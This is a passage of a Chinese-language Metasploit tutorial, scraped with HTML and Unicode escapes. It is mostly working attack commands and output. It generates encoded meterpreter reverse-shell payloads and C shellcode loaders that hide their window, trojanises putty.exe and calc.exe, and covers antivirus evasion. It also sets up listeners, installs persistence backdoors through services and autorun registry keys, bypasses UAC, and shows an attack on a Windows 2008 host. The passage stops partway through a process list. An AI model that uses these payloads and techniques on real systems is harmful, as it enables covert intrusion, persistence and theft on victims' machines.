    msfvenom -a x86 –platform windows -e x86\/countdown -i 8  -f raw | \\<\/p>\n\n\n\n

    msfvenom -a x86 –platform windows -e x86\/shikata_ga_nai -i 9 -f exe -o payload.exe<\/p>\n\n\n\n

    (7)\u7f16\u8bd1\u751f\u6210\u7684C\u6587\u4ef6<\/p>\n\n\n\n

    #win x86\u751f\u6210c\u6587\u4ef6<\/p>\n\n\n\n

    msfvenom -p windows\/meterpreter\/reverse_tcp lhost=[AttackerIP] lport=4444 -f c -e x86\/shikata_ga_nai -i 12 -b ‘\\x00’<\/p>\n\n\n\n

    #vc++6.0 \u7f16\u8bd1\uff08\u542bbuf\u6570\u7ec4\u7684\uff09C\u4ee3\u7801\uff1a<\/p>\n\n\n\n

    #include <stdio.h><\/p>\n\n\n\n

    #pragmacomment( linker, “\/subsystem:\\”windows\\” \/entry:\\”mainCRTStartup\\””)\/\/\u8fd0\u884c\u65f6\u4e0d\u663e\u793a\u7a97\u53e3<\/p>\n\n\n\n

    unsignedchar buf[] =<\/p>\n\n\n\n

    “buf\u6570\u7ec4”;\/\/\u590d\u5236\u6570\u7ec4\u5185\u5bb9\u7c98\u8d34\u5230\u6b64\u5904<\/p>\n\n\n\n

    main()<\/p>\n\n\n\n

    {<\/p>\n\n\n\n

    ((void(*)(void))&buf)();<\/p>\n\n\n\n

    }<\/p>\n\n\n\n

    #VS \u7f16\u8bd1\uff1a<\/p>\n\n\n\n

    main()<\/p>\n\n\n\n

    {<\/p>\n\n\n\n

        Memory = VirtualAlloc(NULL, sizeof(buf), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);<\/p>\n\n\n\n

        memcpy(Memory, buf, sizeof(buf));<\/p>\n\n\n\n

    ((void(*)())Memory)();<\/p>\n\n\n\n

    }<\/p>\n\n\n\n

    7.\u6ce8\u5165exe\u578b+\u7f16\u7801<\/a><\/p>\n\n\n\n

    msfvenom -p <payload> <payload options> -a <arch> --plateform <platform> -e <encoder option> -i <encoder times> -x <template> -k <keep> -f <format> -o <path><\/code><\/pre>\n\n\n\n
    \u6d4b\u8bd5\uff1a<\/a><\/p>\n\n\n\n
    > msfvenom -p windows\/meterpreter\/reverse_tcp -a x86 -e x86\/shikata_ga_nai -i 3 -x 'F:\/putty.exe' -f exe -o injection.exe<\/code><\/pre>\n\n\n\n
     <\/code><\/pre>\n\n\n\n
    DL is deprecated, please use Fiddle<\/code><\/pre>\n\n\n\n
    No platform was selected, choosing Msf::Module::Platform::Windows from the payload<\/code><\/pre>\n\n\n\n
    Found 1 compatible encoders<\/code><\/pre>\n\n\n\n
    Attempting to encode payload with3 iterations of x86\/shikata_ga_nai<\/code><\/pre>\n\n\n\n
    x86\/shikata_ga_nai succeeded with size 360 (iteration=0)<\/code><\/pre>\n\n\n\n
    x86\/shikata_ga_nai succeeded with size 387 (iteration=1)<\/code><\/pre>\n\n\n\n
    x86\/shikata_ga_nai succeeded with size 414 (iteration=2)<\/code><\/pre>\n\n\n\n
    x86\/shikata_ga_nai chosen with final size 414<\/code><\/pre>\n\n\n\n
    Payload size: 414 bytes<\/code><\/pre>\n\n\n\n
    Final size of exe file: 6144 bytes<\/code><\/pre>\n\n\n\n
    Saved as: injection.exe<\/code><\/pre>\n\n\n\n
    8.\u62fc\u63a5\u578b<\/a><\/p>\n\n\n\n
    msfvenom -c <shellcode> -p <payload> <payload options> -a <arch> --platform <platform> -e <encoder option> -i <encoder times> -f <format> -o <path><\/code><\/pre>\n\n\n\n
    \u6d4b\u8bd5\uff1a<\/a><\/p>\n\n\n\n
    > msfvenom -c \"win.exe\" -p windows\/meterpreter\/reverse_tcp -a x86 -e x86\/shikata_ga_nai -i 3 -x 'F:\/putty.exe' -f exe -o injection.exe<\/code><\/pre>\n\n\n\n
     <\/code><\/pre>\n\n\n\n
    DL is deprecated, please use Fiddle<\/code><\/pre>\n\n\n\n
    No platform was selected, choosing Msf::Module::Platform::Windows from the payload<\/code><\/pre>\n\n\n\n
    Adding shellcode from win.exe to the payload<\/code><\/pre>\n\n\n\n
    Found 1 compatible encoders<\/code><\/pre>\n\n\n\n
    Attempting to encode payload with3 iterations of x86\/shikata_ga_nai<\/code><\/pre>\n\n\n\n
    x86\/shikata_ga_nai succeeded with size 5794 (iteration=0)<\/code><\/pre>\n\n\n\n
    x86\/shikata_ga_nai succeeded with size 5823 (iteration=1)<\/code><\/pre>\n\n\n\n
    x86\/shikata_ga_nai succeeded with size 5852 (iteration=2)<\/code><\/pre>\n\n\n\n
    x86\/shikata_ga_nai chosen with final size 5852<\/code><\/pre>\n\n\n\n
    Payload size: 5852 bytes<\/code><\/pre>\n\n\n\n
    Final size of exe file: 11264 bytes<\/code><\/pre>\n\n\n\n
    Saved as: injection.exe<\/code><\/pre>\n\n\n\n
    9.\u641c\u7d22<\/a><\/p>\n\n\n\n
    msfvenom -l | grep windows | grep x64 | grep tcp<\/code><\/pre>\n\n\n\n
    \"\"\/<\/figure>\n\n\n\n
    10.\u7ed5\u8fc7\u514d\u6740<\/p>\n\n\n\n
    nops\u9009\u9879<\/p>\n\n\n\n
    > msfvenom -l nops<\/code><\/pre>\n\n\n\n
     <\/code><\/pre>\n\n\n\n
    DL \n deprecated, please use Fiddle\n<\/code><\/pre>\n\n\n\n
     <\/code><\/pre>\n\n\n\n
    Framework NOPs (\n total)\n<\/code><\/pre>\n\n\n\n
    ========================<\/code><\/pre>\n\n\n\n
     <\/code><\/pre>\n\n\n\n
        Name             Description<\/code><\/pre>\n\n\n\n
        ----             -----------<\/code><\/pre>\n\n\n\n
        armle\/simple     Simple NOP generator<\/code><\/pre>\n\n\n\n
        php\/generic      Generates harmless padding \n PHP scripts\n<\/code><\/pre>\n\n\n\n
        ppc\/simple       Simple NOP generator<\/code><\/pre>\n\n\n\n
        sparc\/random     SPARC NOP generator<\/code><\/pre>\n\n\n\n
        tty\/generic      Generates harmless padding \n TTY input\n<\/code><\/pre>\n\n\n\n
        x64\/simple       An x64 single\/multi byte NOP instruction generator.<\/code><\/pre>\n\n\n\n
        x86\/opty2        Opty2 multi-byte NOP generator<\/code><\/pre>\n\n\n\n
        x86\/single_byte  Single-byte NOP generator<\/code><\/pre>\n\n\n\n
    payload\u751f\u6210\u5668Veil-Evasion \uff08\u514d\u6740\u6548\u679c\u597d\uff09
    https:\/\/github.com\/Veil-Framework\/Veil-Evasion<\/a>
    \u73b0\u5728Veil 3.0<\/p>\n\n\n\n
    11.\u7cfb\u7edf\u67b6\u6784<\/a><\/p>\n\n\n\n
    (1)\u67b6\u6784<\/p>\n\n\n\n
    Arch:x86\u3000 \u662f\u6307\u751f\u6210\u7684payload\u53ea\u80fd\u572832\u4f4d\u7cfb\u7edf\u8fd0\u884c
    Arch:x86_64\u3000\u662f\u6307\u6a21\u5757\u540c\u65f6\u517c\u5bb932\u4f4d\u64cd\u4f5c\u7cfb\u7edf\u548c64\u4f4d\u64cd\u4f5c\u7cfb\u7edf
    Arch:x64 \u3000\u662f\u6307\u751f\u6210\u7684payload\u53ea\u80fd\u572864\u4f4d\u7cfb\u7edf\u8fd0\u884c<\/p>\n\n\n\n
    (2)\u6ce8\u610f<\/p>\n\n\n\n
    \u6709\u7684payload\u7684\u9009\u9879\u4e3a\u591a\u4e2a\uff1aArch:x86_64\uff0cx64
    \u8fd9\u91cc\u4f60\u5c31\u9700\u8981-a\u53c2\u6570\u9009\u62e9\u4e00\u4e2a\u7cfb\u7edf\u67b6\u6784\u3002
    \u540c\u65f6\u6ce8\u610f\u4ee5\u4e0b\uff1asize(\u5927\u5c0f)\uff0crank(\u7b49\u7ea7)\uff0cexitfunc(\u9000\u51fa\u65b9\u6cd5)<\/p>\n\n\n\n
    (3)\u7edf\u4e00<\/p>\n\n\n\n
    \u9700\u8981\u6ce8\u610f\u7684\u662f\u8f6f\u4ef6\u7684\u67b6\u6784\uff0fpayload\u7684\u67b6\u6784\uff0f\u76ee\u6807\u7cfb\u7edf\u7684\u67b6\u6784
    \u4e09\u8005\u4e00\u5b9a\u8981\u7edf\u4e00\uff08x86\/x86_64\/x64\uff09\uff0c\u5426\u5219\u4f1a\u51fa\u9519\u3002<\/p>\n\n\n\n
    \u4e3e\u4f8b1\uff1a
    payload\/windows\/x64\/meterpreter_reverse_tcp<\/p>\n\n\n\n
    > msfvenom -p windows\/x64\/meterpreter_reverse_tcp --payload-option<\/code><\/pre>\n\n\n\n
     <\/code><\/pre>\n\n\n\n
    DL \n deprecated, please use Fiddle\n<\/code><\/pre>\n\n\n\n
    Options \n payload\/windows\/x64\/meterpreter_reverse_tcp:\n<\/code><\/pre>\n\n\n\n
     <\/code><\/pre>\n\n\n\n
     <\/code><\/pre>\n\n\n\n
           Name: Windows Meterpreter Shell, Reverse TCP Inline x64<\/code><\/pre>\n\n\n\n
         Module: payload\/windows\/x64\/meterpreter_reverse_tcp<\/code><\/pre>\n\n\n\n
       Platform: Windows<\/code><\/pre>\n\n\n\n
           Arch: x64, x86_64<\/code><\/pre>\n\n\n\n
    Needs Admin: No<\/code><\/pre>\n\n\n\n
     Total size: \n\n<\/code><\/pre>\n\n\n\n
           Rank: Normal<\/code><\/pre>\n\n\n\n
     <\/code><\/pre>\n\n\n\n
    Provided by:<\/code><\/pre>\n\n\n\n
        OJ Reeves<\/code><\/pre>\n\n\n\n
        sf <stephen_fewer@harmonysecurity.com><\/code><\/pre>\n\n\n\n
     <\/code><\/pre>\n\n\n\n
    Basic options:<\/code><\/pre>\n\n\n\n
    Name        Current Setting  Required  Description<\/code><\/pre>\n\n\n\n
    ----        ---------------  --------  -----------<\/code><\/pre>\n\n\n\n
    EXITFUNC    process          yes       Exit technique (Accepted: \n, seh, thread, process, none)\n<\/code><\/pre>\n\n\n\n
    EXTENSIONS                   no        Comma-separate list of extensions to load<\/code><\/pre>\n\n\n\n
    EXTINIT                      no        Initialization strings \n extensions\n<\/code><\/pre>\n\n\n\n
    LHOST                        yes       The listen address<\/code><\/pre>\n\n\n\n
    LPORT       \n             yes       The listen port\n<\/code><\/pre>\n\n\n\n
    \u4e3e\u4f8b2\uff1a
    windows\/x64\/meterpreter\/reverse_tcp<\/p>\n\n\n\n
    load\/windows\/x64\/meterpreter\/reverse_tcp:<\/code><\/pre>\n\n\n\n
     <\/code><\/pre>\n\n\n\n
     <\/code><\/pre>\n\n\n\n
           Name: Windows Meterpreter (Reflective Injection x64), Windows x64 Reverse TCP Stager<\/code><\/pre>\n\n\n\n
         Module: payload\/windows\/x64\/meterpreter\/reverse_tcp<\/code><\/pre>\n\n\n\n
       Platform: Windows<\/code><\/pre>\n\n\n\n
           Arch: x86_64<\/code><\/pre>\n\n\n\n
    Needs Admin: No<\/code><\/pre>\n\n\n\n
     Total size: \n\n<\/code><\/pre>\n\n\n\n
           Rank: Normal<\/code><\/pre>\n\n\n\n
     <\/code><\/pre>\n\n\n\n
    Provided by:<\/code><\/pre>\n\n\n\n
        skape <mmiller@hick.org><\/code><\/pre>\n\n\n\n
        sf <stephen_fewer@harmonysecurity.com><\/code><\/pre>\n\n\n\n
        OJ Reeves<\/code><\/pre>\n\n\n\n
     <\/code><\/pre>\n\n\n\n
    Basic options:<\/code><\/pre>\n\n\n\n
    Name      Current Setting  Required  Description<\/code><\/pre>\n\n\n\n
    ----      ---------------  --------  -----------<\/code><\/pre>\n\n\n\n
    EXITFUNC  process          yes       Exit technique (Accepted: \n, seh, thread, process, none)\n<\/code><\/pre>\n\n\n\n
    LHOST                      yes       The listen address<\/code><\/pre>\n\n\n\n
    LPORT     \n             yes       The listen port\n<\/code><\/pre>\n\n\n\n
     <\/code><\/pre>\n\n\n\n
    Description:<\/code><\/pre>\n\n\n\n
      Inject the meterpreter server DLL via the Reflective<\/code><\/pre>\n\n\n\n
    \u4eceArch\u770b\u51fa\uff0c\u7b2c\u4e00\u4e2a\u53ef\u4ee5\u7528\u4e8ex64, x86_64\u800c\u7b2c\u4e8c\u4e2a\u53ea\u80fdx86_64\u3002
    \u8fd9\u662f\u9700\u8981\u6ce8\u610f\u7684\u5730\u65b9\u3002<\/p>\n\n\n\n
    12.\u81ea\u9009\u6a21\u5757<\/p>\n\n\n\n
    \u751f\u6210\u6267\u884c\u8ba1\u7b97\u5668payload\u4f8b\u5b50\uff1a<\/p>\n\n\n\n
    msfvenom -p windows\/meterpreter\/bind_tcp -x calc.exe -f exe > 1.exe<\/p>\n\n\n\n
    13.payload\u7684\u5751<\/p>\n\n\n\n
    \u6b63\u5e38\u60c5\u51b5\u4e0b\uff0c\u5229\u7528msfvenom\u751f\u6210\u7684\u6728\u9a6c\u6587\u4ef6\uff0c\u53ef\u76f4\u63a5\u4e0a\u4f20\u5230\u76ee\u6807\u670d\u52a1\u5668\u4e0a\u8fd0\u884c\uff08\u52a0\u6743\u9650\uff09\u3002\u4f46\u6211\u81ea\u5df1\u9047\u5230\u8fc7\u4e00\u4e2a\u5751\uff0c\u751f\u6210\u7684\u6587\u4ef6\u5185\u5bb9\u6709\u90e8\u5206\u662f\u65e0\u7528\u7684\uff0c\u4f1a\u5f15\u8d77\u62a5\u9519\uff0c\u5982\u4e0b\u56fe\u6240\u793a\u3002
    <\/a>
    <\/a>
    \u89e3\u51b3\u65b9\u6848\u662fvim\u6587\u4ef6\uff0c\u5220\u9664\u6587\u4ef6\u5f00\u5934\u4e24\u884c\u65e0\u6548\u7684\u5185\u5bb9\u3002<\/p>\n\n\n\n
    0x07\u83b7\u53d6meterpreter<\/h2>\n\n\n\n
    1.\u9996\u5148\u751f\u6210\u53ef\u6267\u884c\u6587\u4ef6<\/p>\n\n\n\n
    root @ kali\uff1a\u301c\uff03msfvenom -p  windows\/meterpreter\/reverse_tcp lhost=192.168.1.102 lport=4444  -f exe -o  shell.exe<\/p>\n\n\n\n
    2.\u542f\u52a8msfconsole\uff0c\u76d1\u542c\u53cd\u8fde\u7aef\u53e3<\/p>\n\n\n\n
    root @ kali\uff1a\u301c\uff03msfconsole<\/p>\n\n\n\n
    msf>use  exploit\/multi \/handler<\/p>\n\n\n\n
    msf exploit\uff08handler\uff09> set  PAYLOAD windows\/meterpreter\/reverse_tcp<\/p>\n\n\n\n
    PAYLOAD => window \/meterpreter\/reverse_tcp<\/p>\n\n\n\n
    msf exploit\uff08handler\uff09> set LHOST 0.0.0.0<\/p>\n\n\n\n
    msf exploit\uff08handler\uff09>set  LPORT  444<\/p>\n\n\n\n
    msf exploit\uff08handler\uff09>show options<\/p>\n\n\n\n
    msf exploit\uff08handler\uff09>exploit<\/p>\n\n\n\n
    0x08 \u6301\u7eed\u6027\u540e\u95e8<\/h2>\n\n\n\n
    1.metsvc\u540e\u6e17\u900f\u653b\u51fb\u6a21\u5757<\/p>\n\n\n\n
    metsvc\u540e\u6e17\u900f\u653b\u51fb\u6a21\u5757\u5176\u5b9e\u5c31\u662f\u5c06Meterpreter\u4ee5\u7cfb\u7edf\u670d\u52a1\u7684\u5f62\u5f0f\u5b89\u88c5\u5230\u76ee\u6807\u4e3b\u673a\uff0c\u5b83\u4f1a\u4e0a\u4f20\u4e09\u4e2a\u6587\u4ef6\uff1a<\/p>\n\n\n\n
    metsvc.dll<\/p>\n\n\n\n
    metsvc-service.exe<\/p>\n\n\n\n
    metsvc.exe<\/p>\n\n\n\n
    \u8c03\u7528metsvc\u540e\u6e17\u900f\u653b\u51fb\u6a21\u5757<\/p>\n\n\n\n
    \u547d\u4ee4\uff1arun  metsvc<\/p>\n\n\n\n
    \u6548\u679c\u5982\u4e0b\u56fe\uff1a<\/p>\n\n\n\n
    \"\"
    \u6267\u884c\u8fc7\u7a0b\uff1a\u5728\u76ee\u6807\u4e3b\u673a\u4e0a\u521b\u5efa\u4e00\u4e2a\u76d1\u542c31337\u7aef\u53e3\u7684\u670d\u52a1->\u5728\u76ee\u6807\u4e3b\u673ac:\\windows\\temp\\\u4e0b\u521b\u5efa\u4e00\u4e2a\u5b58\u653e\u540e\u95e8\u670d\u52a1\u6709\u5173\u6587\u4ef6\u7a0b\u5e8f\u7684\u76ee\u5f55\uff0c\u5e76\u4e0a\u4f20metsrv.x86.dll\u3001metsvc-server.exe\u3001metsvc.exe\u4e09\u4e2a\u6587\u4ef6\u5230\u8be5\u76ee\u5f55\u4e0b->\u5f00\u542f\u670d\u52a1<\/p>\n\n\n\n
    \u6210\u529f\u540e\uff1a\u5728\u76ee\u6807\u4e3b\u673a\u4e0a\u770b\u523031337\u53f7\u7aef\u53e3\u5df2\u5f00\uff0c\u4e14\u670d\u52a1\u591a\u4e86\u4e00\u4e2ameterpreter(\u5982\u4e0b\u56fe)
    \"\"

    \"\"<\/p>\n\n\n\n
    \u4f7f\u7528\u65b9\u6cd5\uff1a<\/p>\n\n\n\n
    \"\"\/<\/figure>\n\n\n\n
    \u5230\u76ee\u6807\u673a\u4e0a\uff0c\u6211\u4eec\u53ef\u4ee5\u53d1\u73b0Meterpreter\u670d\u52a1\uff0c\u6b63\u5728\u5f00\u542f\u76d1\u542c\u5e76\u7b49\u5f85\u8fde\u63a5\u3002<\/p>\n\n\n\n
    \"\"\/<\/figure>\n\n\n\n
    Meterpreter\u670d\u52a1\u540e\u95e8<\/p>\n\n\n\n
    meterpreter > run metsvc<\/p>\n\n\n\n
    [*] Creating a meterpreter service on port 31337<\/p>\n\n\n\n
    [*] Creating a temporary installation directory C:\\Users\\Croxy\\AppData\\Local\\Temp\\tuIKWqmuO…<\/p>\n\n\n\n
    [*]  >> Uploading metsrv.x86.dll…<\/p>\n\n\n\n
    [*]  >> Uploading metsvc-server.exe…<\/p>\n\n\n\n
    [*]  >> Uploading metsvc.exe…<\/p>\n\n\n\n
    [*] Starting the service…<\/p>\n\n\n\n
    * Installing service metsvc<\/p>\n\n\n\n
    * Starting service<\/p>\n\n\n\n
    * Service metsvc successfully installed.<\/p>\n\n\n\n
    \u4e4b\u540e\u7535\u8111\u5c31\u9ed8\u9ed8\u751f\u6210\u4e86\u4e00\u4e2a\u81ea\u542f\u670d\u52a1Meterpreter<\/p>\n\n\n\n
    \u7136\u540e\u8fde\u63a5\u540e\u95e8<\/p>\n\n\n\n
    msf exploit(handler) > use exploit\/multi\/handler<\/p>\n\n\n\n
    msf exploit(handler) > set payload windows\/metsvc_bind_tcp<\/p>\n\n\n\n
    payload => windows\/metsvc_bind_tcp<\/p>\n\n\n\n
    msf exploit(handler) > set RHOST 10.42.0.54<\/p>\n\n\n\n
    RHOST => 10.42.0.54<\/p>\n\n\n\n
    msf exploit(handler) > set LPORT 31337<\/p>\n\n\n\n
    LPORT => 31337<\/p>\n\n\n\n
    msf exploit(handler) > exploit<\/p>\n\n\n\n
    2. persistence\u6a21\u5757\u540e\u95e8<\/p>\n\n\n\n
    \u4e00\u4e2avbs\u540e\u95e8\u5199\u5165\u4e86\u5f00\u673a\u542f\u52a8\u9879\u4f46\u662f\u5bb9\u6613\u88ab\u53d1\u73b0\u8fd8\u662f\u9700\u8981\u5927\u5bb6\u53d1\u6325\u81ea\u5df1\u7684\u667a\u6167:)<\/p>\n\n\n\n
    meterpreter > run persistence -X -i 5 -p 23333 -r 10.42.0.1<\/p>\n\n\n\n
    [*] Running Persistance Script<\/p>\n\n\n\n
    [*] Resource file for cleanup created at \/home\/croxy\/.msf4\/logs\/persistence\/TESTING_20150930.3914\/TESTING_20150930.3914.rc<\/p>\n\n\n\n
    [*] Creating Payload=windows\/meterpreter\/reverse_tcp LHOST=10.42.0.1 LPORT=23333<\/p>\n\n\n\n
    [*] Persistent agent script is 148453 bytes long<\/p>\n\n\n\n
    [+] Persistent Script written to C:\\Users\\Croxy\\AppData\\Local\\Temp\\ulZpjVBN.vbs<\/p>\n\n\n\n
    [*] Executing script C:\\Users\\Croxy\\AppData\\Local\\Temp\\ulZpjVBN.vbs<\/p>\n\n\n\n
    [+] Agent executed with PID 4140<\/p>\n\n\n\n
    [*] Installing into autorun as HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\okiASNRzcLenulr<\/p>\n\n\n\n
    [+] Installed into autorun as HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\okiASNRzcLenulr<\/p>\n\n\n\n
    0x09 meterpreter\u7ed5\u8fc7uac<\/h2>\n\n\n\n
    \u7531\u4e8e\u7ed5\u8fc7 UAC \u7684\u529f\u80fd\u9700\u5728 meterpreter \u7684shell \u624d\u80fd\u5b9e\u73b0\u3002\u56e0\u6b64\uff0c\u6211\u4eec\u9996\u5148\u8981\u505a\u7684\u5c31\u662f\u53d6\u5f97\u76ee\u6807\u673a\u5668\u7684 meterpreter shell \u3002<\/p>\n\n\n\n
    \uff081\uff09\u751f\u6210\u4e00\u4e2a payload<\/p>\n\n\n\n
    msfvenom -p windows\/meterpreter\/reverse_tcp lhost=192.168.15.131 lport=4444 -f exe -o \/root\/virus.exe -e x86\/shikata_ga_nai -i 8<\/p>\n\n\n\n
    \"20161006093606\"\/<\/figure>\n\n\n\n
    \u5c06\u4ee5\u4e0a\u751f\u6210\u7684 payload \u53d1\u9001\u7ed9\u76ee\u6807\u673a\u5668\u5e76\u8ba9\u5176\u6267\u884c!<\/p>\n\n\n\n
    \uff082\uff09kali \u4e0a\u914d\u7f6e\u4e00\u4e2a\u53cd\u5f39\u4f1a\u8bdd\u5904\u7406\u7a0b\u5e8f<\/p>\n\n\n\n
    msf>use exploit\/multi\/handler<\/p>\n\n\n\n
    msf>set payload windows\/meterpreter\/reverse_tcp<\/p>\n\n\n\n
    msf>set LHOST 192.168.15.131<\/p>\n\n\n\n
    msf>set LPORT 4444<\/p>\n\n\n\n
    msf>exploit<\/p>\n\n\n\n
    \"20161006092923\"\/<\/figure>\n\n\n\n
    \u8fd9\u91cc\u518d\u4ecb\u7ecd\u4e00\u79cd\uff0c\u751f\u6210\u53cd\u5f39 shell \u7684\u65b9\u5f0f\u3002\u5c31\u662f\u76f4\u63a5\u4ee5 raw \u7684\u5f62\u5f0f\u4fdd\u5b58\u6210\u6587\u4ef6\u53ea\u8981\u76ee\u6807\u8fdb\u884c\u4e86\u8bbf\u95ee\uff0c\u5c31\u4f1a\u53cd\u5f39\u56de shell \u3002\u5177\u4f53\u751f\u6210\u547d\u4ee4\u5982\u4e0b\uff1a<\/p>\n\n\n\n
    msfvenom -p php\/meterpreter\/reverse_tcp LHOST=192.168.15.131 LPORT=4444 -f raw -o x.php<\/p>\n\n\n\n
    \u5f53\u76ee\u6807\u673a\u5668\u6210\u529f\u6267\u884cpayload\u540e\u6211\u4eec\u5c31\u53d6\u5f97\u4e86\u4e00\u4e2a meterpreter shell \u3002<\/p>\n\n\n\n
    \"20161006094048\"\/<\/figure>\n\n\n\n
    \uff083\uff09\u5229\u7528 getuid \u548c getsystem \u547d\u4ee4\u6765\u63d0\u6743<\/p>\n\n\n\n
    \"20161006100046\"\/<\/figure>\n\n\n\n
    \uff084\uff09\u8fdb\u884cUAC\u6743\u9650\u7ed5\u8fc7<\/p>\n\n\n\n
    \u4ece\u4ee5\u4e0a\u7ed3\u679c\u6211\u4eec\u57fa\u672c\u53ef\u4ee5\u5224\u5b9a\u906d\u5230\u4e86 UAC \u7684\u7528\u6237\u8bbf\u95ee\u63a7\u5236\u7684\u62e6\u622a\uff01\u65e2\u7136\u8fd9\u6837\uff0c\u90a3\u4e48\u6211\u4eec\u6765\u5229\u7528 meterpreter \u7684\u5f3a\u5927\u529f\u80fd\u6765\u8fdb\u884c\u7ed5\u8fc7\uff01<\/p>\n\n\n\n
    msf>use exploit\/windows\/local\/ask<\/p>\n\n\n\n
    msf>show options<\/p>\n\n\n\n
    msf>set session 1<\/p>\n\n\n\n
    msf>exploit<\/p>\n\n\n\n
    \"20161006104840\"\/<\/figure>\n\n\n\n
    \u5f53\u6211\u4eec\u6210\u529f\u6267\u884c\u4ee5\u4e0a\u547d\u4ee4\u540e\uff0c\u6211\u4eec\u4f1a\u5728\u76ee\u6807\u7cfb\u7edf\u4e0a\u5f39\u51fa\u4e00\u4e2a\u786e\u8ba4\u6846\u53ea\u8981\u70b9\u51fb\u786e\u8ba4\u5373\u53ef\u6210\u529f\u7ed5\u8fc7\uff01\u73b0\u5728\u6211\u4eec\u518d\u6765\u901a\u8fc7 getuid \u548c getsystem \u547d\u4ee4\u6765\u67e5\u770b\u5f53\u524d\u6211\u4eec\u7684 shell \u6743\u9650\uff1a<\/p>\n\n\n\n
    \"20161006105606\"\/<\/figure>\n\n\n\n
    \"20161006172248\"\/<\/figure>\n\n\n\n
    0x10 meterprter\u5b9e\u6218\u653b\u51fbwindows2008r2x64<\/h2>\n\n\n\n
    \u653b\u51fb\u7aef:
    OS:Kali
    IP:192.168.111.129<\/p>\n\n\n\n
    \u88ab\u5bb3\u7aef:
    OS:Windows server 2008 (64\u4f4d)
    IP:192.168.111.133<\/p>\n\n\n\n
    (1)\u83b7\u53d6\u76ee\u6807\u4e3b\u673a\u53cd\u5f39shell<\/p>\n\n\n\n
    \u9996\u5148\u5728Kali\u4e0a\u751f\u6210meterpreter\u7684payloa<\/p>\n\n\n\n
    root@Kali:~# msfpayload windows\/meterpreter\/reverse_tcp LHOST=192.168.111.129 LPORT=2013 X > file.exe  <\/p>\n\n\n\n
    \u63a5\u4e0b\u6765\u662f\u914d\u7f6e\u76d1\u542c:<\/p>\n\n\n\n
    root@Kali:~# msfconsole<\/p>\n\n\n\n
    msf > use  exploit\/multi\/handler<\/p>\n\n\n\n
    msf exploit(handler) > set PAYLOAD windows\/meterpreter\/reverse_tcp<\/p>\n\n\n\n
    msf exploit(handler) > set LHOST 192.168.111.129<\/p>\n\n\n\n
    msf exploit(handler) > set LPORT 2013<\/p>\n\n\n\n
    msf exploit(handler) > exploit<\/p>\n\n\n\n
    \u7136\u540e\u5728Windows2008\u4e0a\u6267\u884cfile.exe,\u8fd4\u56de\u4e00\u4e2ameterpreter<\/p>\n\n\n\n
    [*] Sending stage (769024 bytes) to 192.168.111.133<\/p>\n\n\n\n
    [*] Meterpreter session 1 opened (192.168.111.129:2013 -> 192.168.111.133:49168) at2014-03-13 22:23:18 +0800<\/p>\n\n\n\n
    meterpreter >
    (2).\u8f6c\u79fbmeterpreter\u5230\u5176\u4ed6\u8fdb\u7a0b
    \u5728\u6e17\u900f\u8fc7\u7a0b\u4e2d\u7531\u4e8e\u5404\u79cd\u539f\u56e0\uff0c\u5f53\u524dmeterpreter\u8fdb\u7a0b\u5f88\u5bb9\u6613\u88ab\u5e72\u6389\uff0c\u5c06meterpreter\u8f6c\u79fb\u5230\u7cfb\u7edf\u5e38\u9a7b\u8fdb\u7a0b\u662f\u4e2a\u597d\u4e3b\u610f<\/p>\n\n\n\n
    meterpreter > getuid  \/\/\u67e5\u770b\u5f53\u524d\u6743\u9650<\/p>\n\n\n\n
    Server username: WIN-K30V5SI0PCEAdministrator<\/p>\n\n\n\n
    meterpreter > ps      \/\/\u5217\u51fa\u5f53\u524d\u8fdb\u7a0b<\/p>\n\n\n\n
    Process List<\/p>\n\n\n\n
    ============<\/p>\n\n\n\n
    PID   PPID  Name              Arch    Session     User                           Path<\/p>\n\n\n\n
    —   —-  —-              —-    ——-     —-                           —-<\/p>\n\n\n\n
    0     0     [System Process]          4294967295                                <\/p>\n\n\n\n
    4     0     System            x86_64  0                                        <\/p>\n\n\n\n
    244   4     smss.exe          x86_64  0           NT AUTHORITYSYSTEM            C:WindowsSystem32smss.exe<\/p>\n\n\n\n
    264   492   svchost.exe       x86_64  0           NT AUTHORITYLOCAL SERVICE     C:WindowsSystem32svchost.exe<\/p>\n\n\n\n
    336   328   csrss.exe         x86_64  0           NT AUTHORITYSYSTEM            C:WindowsSystem32csrss.exe<\/p>\n\n\n\n
    388   380   csrss.exe         x86_64  1           NT AUTHORITYSYSTEM            C:WindowsSystem32csrss.exe<\/p>\n\n\n\n
    396   328   wininit.exe       x86_64  0           NT AUTHORITYSYSTEM            C:WindowsSystem32wininit.exe<\/p>\n\n\n\n
    432   380   winlogon.exe      x86_64  1           NT AUTHORITYSYSTEM            C:WindowsSystem32winlogon.exe<\/p>\n\n\n\n
    492   396   services.exe      x86_64  0           NT AUTHORITYSYSTEM            C:WindowsSystem32services.exe<\/p>\n\n\n\n
    500   396   lsass.exe         x86_64  0           NT AUTHORITYSYSTEM            C:WindowsSystem32lsass.exe<\/p>\n\n\n\n
    512   396   lsm.exe           x86_64  0           NT AUTHORITYSYSTEM            C:WindowsSystem32lsm.exe<\/p>\n\n\n\n
    596   492   svchost.exe       x86_64  0           NT AUTHORITYSYSTEM            C:WindowsSystem32svchost.exe<\/p>\n\n\n\n
    656   492   svchost.exe       x86_64  0           NT AUTHORITYNETWORK SERVICE   C:WindowsSystem32svchost.exe<\/p>\n\n\n\n
    748   492   svchost.exe       x86_64  0           NT AUTHORITYLOCAL SERVICE     C:WindowsSystem32svchost.exe<\/p>\n\n\n\n
    796   492   svchost.exe       x86_64  0           NT AUTHORITYSYSTEM            C:WindowsSystem32svchost.exe<\/p>\n\n\n\n
    840   492   svchost.exe       x86_64  0           NT AUTHORITYLOCAL SERVICE     C:WindowsSystem32svchost.exe<\/p>\n\n\n\n
    856   388   conhost.exe       x86_64  1           WIN-K30V5SI0PCEAdministrator  C:WindowsSystem32conhost.exe<\/p>\n\n\n\n
    860   2044  cmd.exe           x86_64  1           WIN-K30V5SI0PCEAdministrator  C:WindowsSystem32cmd.exe<\/p>\n\n\n\n
    884   492   svchost.exe       x86_64  0           NT AUTHORITYSYSTEM            C:WindowsSystem32svchost.exe<\/p>\n\n\n\n
    924   492   svchost.exe       x86_64  0           NT AUTHORITYNETWORK SERVICE   C:WindowsSystem32svchost.exe<\/p>\n\n\n\n
    972   492   sppsvc.exe        x86_64  0           NT AUTHORITYNETWORK SERVICE   C:WindowsSystem32sppsvc.exe<\/p>\n\n\n\n
